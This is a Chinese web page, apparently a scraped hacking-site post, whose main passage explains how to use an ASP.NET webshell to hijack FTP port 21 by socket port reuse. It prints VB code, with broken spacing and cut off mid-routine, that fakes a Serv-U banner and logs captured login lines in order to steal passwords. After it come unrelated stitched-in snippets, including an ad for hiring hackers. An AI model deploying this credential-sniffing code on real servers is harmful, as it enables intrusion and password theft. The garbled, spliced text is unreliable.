如果你有一个ASP.Net的webshell,那么恭喜你,至少权限比ASP的webshell大些。因为ASP.Net支持Socket,所以可以利用端口复用实现端口劫持。 下面就是劫持21端口的ASP.Net代码,因为FTP协议传文件会新开端口,就没有用中间人方式而是拿到密码之后直接返回421错误。 当然,Windows2003及之后的系统都不再支持端口复用了。 以下是引用片段:<%@PageLanguage="VB"Debug="true"%> <%@importNamespace="System.Threading"%> <%@importNamespace="System.Text"%> <%@importNamespace="System.Net"%> <%@importNamespace="System.Net.Sockets"%> <%@importNamespace="System.IO"%> subform_load(SrcAsObject,EAsEventArgs) myip.Text=request.ServerVariables("LOCAL_ADDR") endsub Sub *** N_Start_Click(senderAsObject,eAsEventArgs) Dimerror_xasExceptionDimipAddressAsIPAddress=ipAddress.Parse(myIP.Text) DimlocalEndPointAsNewIPEndPoint(ipAddress,myport.Text)DimlistenerAsNewSocket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp) listener.SetSocketOption(SocketOptionLevel.Socket,SocketOptionName.ReuseAddress,1) try listener.Bind(localEndPoint) listener.Listen(100) WhileNotfile.exists(server.mappath("snifferexit.dat")) IfCheckBox1.CheckedThen DimmywriteAsNewStreamWriter(server.mappath("snifferexit.dat"),True,Encoding.Default) mywrite.Close() EndIf DimmySocketAsSocket=listener.Accept() ThreadPool.QueueUserWorkItem(NewWaitCallback(AddressOfThreadProc),mySocket) EndWhile listener.Close() Catcherror_x listener.Close() response.write(error_x) EndTry EndSub PrivateSharedSubThreadProc(ByValmySocketAsObject) DimmsgAsByte() Dimbytes(1024)AsByte DimiAsInteger DimnumAsInteger DimxdataAsString Try mySocket.SetSocketOption(SocketOptionLevel.Socket,SocketOptionName.ReceiveTimeout,5000) msg=Encoding.ASCII.GetBytes("220Serv-UFTPServerv6.0forWinSockready..."&vbCrLf) mySocket.Send(msg,msg.Length,0) mySocket.Receive(bytes,0,1024,0) xdata=(Encoding.ASCII.GetString(bytes)) IfInStr(1,xdata,"user",1)>0Then DimmywriteAsNewStreamWriter("e:\myweb\myown\a.txt",True,Encoding.Default) mywrite.WriteLine(Mid(xdata,1,InStr(xdata,vbCrLf))) mywrite.Close()
然后暗码在readme里边。 /body>Level 1 → Level 2request.open('GET', 'http://api.spreaker.com/whoami'); 存在文件...
默许情况下,你现已打开了一个未命名的恳求选项卡。 让咱们来看看 UI 的这一部分。 左上角的 New 按钮一般用于创立调集和恳求。 让咱们首要创立一个调集。 这有点像一个独自的应用程序。 你将...
前几天的快播案件庭审关注度可谓万众瞩目,不少网友在线旁观了案件庭审。 其中快播辩护人的争执谈锋也让不少网友折服,纷纷大打快播无罪的旌旗。 其中一段询问中,公诉人示意起诉快播版权纠纷的是乐视公司。...
最近有好多客户问这些问题,在这里,衣叁唯品给大家归纳一下,品牌折扣店的货源、份货、折扣店的一些常识,希望大家喜欢。 1、为什么大街上有好多品牌折扣店,里面的衣服都是品牌,但是价格很便宜,这是为什么?...
兼职交押金,这是骗子们一个很好的借口,一些人被骗子紧紧抓住心理,一步一步走进全套!到最后一分钱没有挣到,还雪上加霜! 下面推荐一下我认为比较好的手机兼职: 1、现在是互联网的时代有很多的平...
网络黑客联系方式解锁微信(网络黑客联系方式)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客...